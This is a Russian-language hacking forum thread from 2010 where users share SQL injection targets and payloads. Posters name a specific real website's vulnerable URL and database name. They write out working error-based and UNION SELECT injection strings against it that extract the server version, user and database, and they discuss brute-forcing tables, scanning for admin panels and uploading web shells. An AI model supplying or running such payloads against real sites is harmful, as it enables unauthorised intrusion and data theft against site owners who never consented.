HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #14491  
Старый 22.07.2010, 18:38
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

Цитата:
Сообщение от auth_root  
Konqi
огромное тебе спасибо! =) Плюс.
Только вопрос, админку не нашел? =) Если нашел или шелл залил, не мог бы скинуть в пм? Хотелось бы конечно увидеть пошагово, какие ты проводишь манипуляции с запросами при взломе. Но это будет наглеж с моей стороны отбирать твое время. Поэтому я изучаю статейку, хотелось бы все повторить на практике, вплоть до заливки шелла.
админку даже не искал, это уже не мое дело )

проскан сайт (IntelliTamper,DirBuster, ArxScanSite...)
 
Ответить с цитированием

  #14492  
Старый 22.07.2010, 18:57
auth_root
Новичок
Регистрация: 01.02.2010
Сообщений: 12
С нами: 8566197

Репутация: 18
По умолчанию

Konqi

А доступа к системным таблицам нету, как я понимаю, или я не прав?
 
Ответить с цитированием

  #14493  
Старый 22.07.2010, 19:07
AKYLA
Участник форума
Регистрация: 29.11.2007
Сообщений: 116
С нами: 9709737

Репутация: 88
По умолчанию

Yetisports

http://banken.ruilen.nl/random.php?catid=473

Тут блайнд, 4-я ветка

database: admin_ruilen
 
Ответить с цитированием

  #14494  
Старый 22.07.2010, 19:10
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

Цитата:
Сообщение от auth_root  
Konqi
А доступа к системным таблицам нету, как я понимаю, или я не прав?
смотря на какой, нет доступа к Msysobjects, но есть доступ к Msysaccessobjects

а остальные(не дефолтные) таблицы нужно брутить
 
Ответить с цитированием

  #14495  
Старый 22.07.2010, 19:12
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию

Цитата:
Сообщение от AKYLA  
Yetisports
http://banken.ruilen.nl/random.php?catid=473
Тут блайнд, 4-я ветка
database: admin_ruilen
Зачем крутить как blind, если можно добиться вывода?
 
Ответить с цитированием

  #14496  
Старый 22.07.2010, 20:05
Dare
Новичок
Регистрация: 26.04.2010
Сообщений: 26
С нами: 8444531

Репутация: 53
По умолчанию

AKYLA

Код:
http://banken.ruilen.nl/random.php?catid=473+group+by+concat(version(),rand(0)|0)+having+avg(0)--+
ололо ) думаем ребята )
 
Ответить с цитированием

  #14497  
Старый 22.07.2010, 20:12
AKYLA
Участник форума
Регистрация: 29.11.2007
Сообщений: 116
С нами: 9709737

Репутация: 88
По умолчанию

Ну вообще да, можно вывести и так

Цитата:
Сообщение от None  
http://banken.ruilen.nl/random.php?catid=473+UnIoN+SeLeCt+concat_ws%280x3a ,version%28%29,%20user%28%29,database%28%29%29--
 
Ответить с цитированием

  #14498  
Старый 22.07.2010, 20:15
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию

Цитата:
Сообщение от AKYLA  
Ну вообще да, можно вывести и так
Эм... А разница? /showpost.php?p=2262240&postcount=14459

Ах да, я нашёл в чем разница.

Твой способ обрезает часть версии.
 
Ответить с цитированием

  #14499  
Старый 22.07.2010, 20:22
Dare
Новичок
Регистрация: 26.04.2010
Сообщений: 26
С нами: 8444531

Репутация: 53
По умолчанию

Цитата:
Сообщение от mailbrush  
Эм... А разница? /showpost.php?p=2262240&postcount=14459
Ах да, я нашёл в чем разница.
Твой способ обрезает часть версии.
Что где обрезанно? О_О что то я вас не понимаю молодой человек Раскрути ее своим запросом, вот тебе и разница

PS:Хотя спорить бесполезно каждый кулик свое болото хвалит.
 
Ответить с цитированием

  #14500  
Старый 22.07.2010, 21:24
IMMORTAL_S
Новичок
Регистрация: 29.04.2010
Сообщений: 19
С нами: 8440113

Репутация: 3
По умолчанию

Объясните "что делает" эта запись rand(0)|0 ?? ну в смысле, для чего нужна вертикальная черта?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.